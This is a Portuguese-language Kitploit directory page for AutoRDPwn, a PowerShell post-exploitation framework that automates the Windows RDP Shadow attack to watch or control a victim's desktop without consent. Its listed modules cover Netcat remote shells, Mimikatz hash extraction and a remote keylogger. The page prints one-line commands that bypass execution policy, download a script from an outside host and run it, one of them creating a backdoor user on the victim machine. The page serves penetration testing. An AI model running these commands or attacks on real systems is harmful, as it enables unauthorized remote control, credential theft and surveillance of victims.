Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
AutoRDPwn — O Shadow Attack Framework | Kitploit
Ferramentas/GitHubGitHub/joelgmsec/autordpwn
Quebra de SenhasEscalada de PrivilégiosGeração de PayloadsMovimento LateralPós-ExploraçãoTestes de PenetraçãoRed TeamingFerramenta de Acesso Remoto
GitHubjoelgmsec/autordpwn

AutoRDPwn

O Shadow Attack Framework

Ver Repositório
1.1k499há 4 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Site

AutoRDPwn

AutoRDPwn é uma estrutura de pós-exploração criada em Powershell, projetada principalmente para automatizar o ataque Shadow em computadores Microsoft Windows. Esta vulnerabilidade (listada como uma funcionalidade pela Microsoft) permite que um invasor remoto veja a área de trabalho da sua vítima sem o consentimento dela, e até mesmo a controle sob demanda, usando ferramentas nativas do próprio sistema operacional.

Graças aos módulos adicionais, é possível obter um shell remoto através do Netcat, extrair hashes do sistema com o Mimikatz, carregar um keylogger remoto e muito mais. Tudo isso, através de um menu completamente intuitivo em sete idiomas diferentes.

Além disso, é possível usá-lo em um shell reverso através de uma série de parâmetros descritos na seção de uso.

Requisitos

Powershell 4.0 ou superior

Alterações

Versão 5.1

• Muitos bugs corrigidos

• Melhorias estéticas e tempos de espera aprimorados

• Conexão Proxy-Aware através das configurações do sistema

• Agora é possível usar a ferramenta offline baixando o arquivo .zip

• Detecção automática de idioma ao pressionar a tecla Enter

• Invoke-DCOM foi substituído pelo SharpRDP

• PowerUp foi substituído pelo Invoke-PrivescCheck

• Criação da sub-rotina de limpeza automática na vítima

• Novo módulo disponível: SMB Shell criptografado com AES

• Novo módulo disponível: Alterar usuário com RunAs

*O restante das alterações pode ser consultado no arquivo CHANGELOG

Uso

Esta aplicação pode ser usada localmente, remotamente ou para pivotear entre equipes.

Quando usada remotamente em um shell reverso, é necessário usar os seguintes parâmetros:

Execução local em uma linha:

root@kitploit:~
powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"

Exemplo de execução remota em uma linha:

root@kitploit:~
powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1 -admin -nogui -lang English -option 4 -shadow control -createuser"

O guia detalhado de uso pode ser encontrado no seguinte link:

https://darkbyte.net/autordpwn-la-guia-definitiva

Capturas de tela

AutoRDPwn1_en AutoRDPwn2_en

Licença

Este projeto está licenciado sob a licença GNU 3.0 - consulte o arquivo LICENSE para mais detalhes.

Créditos e Agradecimentos

Este framework foi criado e projetado do zero por Joel Gámez Molina // @JoelGMSec

Alguns módulos usam código, scripts e ferramentas de terceiros, particularmente:

• Chachi-Enumerator por Luis Vacas --> https://github.com/Hackplayers/PsCabesha-tools

• Invoke-Phant0m por Halil Dalabasmaz --> https://github.com/hlldz/Invoke-Phant0m

• Invoke-PowerShellTcp por Nikhil "SamratAshok" Mittal --> https://github.com/samratashok/nishang

• Invoke-TheHash por Kevin Robertson --> https://github.com/Kevin-Robertson/Invoke-TheHash

• Mimikatz por Benjamin Delpy --> https://github.com/gentilkiwi/mimikatz

• PsExec por Mark Russinovich --> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec

• RDP Wrapper por Stas'M Corp. --> https://github.com/stascorp/rdpwrap

• SharpRDP por Steven F --> https://github.com/0xthirteen/SharpRDP

E muitos outros, que não cabem aqui.. Obrigado a todos eles e seu excelente trabalho.

Contato

Este software não oferece nenhum tipo de garantia. Seu uso é exclusivo para ambientes educacionais e/ou auditorias de segurança com o correspondente consentimento do cliente. Não me responsabilizo pelo seu uso indevido ou por qualquer dano causado por ele.

Para mais informações, você pode me encontrar no Twitter como @JoelGMSec e no meu blog darkbyte.net.

Suporte

Você pode apoiar meu trabalho comprando-me um café:

buymeacoffe

Baixar ferramenta
ParâmetroDescrição
-admin / -noadminDependendo das permissões que temos, usaremos um ou outro
-noguiIsto evitará carregar o menu e algumas cores, garantindo sua funcionalidade
-langEscolheremos nosso idioma (Inglês, Espanhol, Francês, Alemão, Italiano, Russo ou Português)
-optionAssim como no menu, podemos escolher como lançar o ataque
-shadowDecidiremos se queremos ver ou controlar o dispositivo remoto
-createuserEste parâmetro é opcional, o usuário AutoRDPwn:AutoRDPwn será criado na máquina vítima
-nocleanDesabilita o processo de desfazer todas as alterações no computador vítima